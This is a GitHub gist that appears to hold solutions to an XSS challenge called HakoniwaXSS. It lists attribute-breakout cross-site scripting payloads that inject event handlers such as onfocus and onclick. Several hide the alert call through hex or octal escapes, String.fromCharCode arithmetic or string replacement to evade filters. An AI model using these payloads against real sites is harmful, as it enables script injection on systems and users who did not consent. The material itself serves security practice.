Skip to content

Instantly share code, notes, and snippets.

@lmt-swallow
Created January 26, 2014 04:02
Show Gist options
  • Save lmt-swallow/03170ca9c079e2ea555a to your computer and use it in GitHub Desktop.
Save lmt-swallow/03170ca9c079e2ea555a to your computer and use it in GitHub Desktop.
HakoniwaXSS Final
"onfocusin="top['\x61\x6C\x65\x72\x74']('\x58\x53\x53')"
"onfocusout="parent[String.fromCharCode(500-403,500-392,500-399,500-386,500-384)](String.fromCharCode(300-212,300-217,300-217))"
"onfocus="window['\141\154\145\162\164']('\130\123\123')"
"onKeyDown="parent['aleraaaaat'.replace('aaaaa','')]('XaaaaaSaaaaaS'.replace('aaaaa','').replace('aaaaa',''))"
"onDblClick="window['aleraaaat'.replace('aaaa','')]('XaaaaSaaaaS'.replace('aaaa','').replace('aaaa',''))"
"onMouseUp="window[String.fromCharCode(501-404,501-393,501-400,501-387,501-385)]('XSS')"
"onMouseEnter="alert('XSS')"
"onMouseDown="alert('XSS')"
"onDragStart="alert('XSS')"
"onCut="alert('XSS')"
"onKeyUp="alert('XSS')"
"onCopy="alert('XSS')"
"onPaste="alert('XSS')"
"onMouseOver="alert('XSS')"
"onDrag="alert('XSS')"
"onclick="alert('XSS')"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment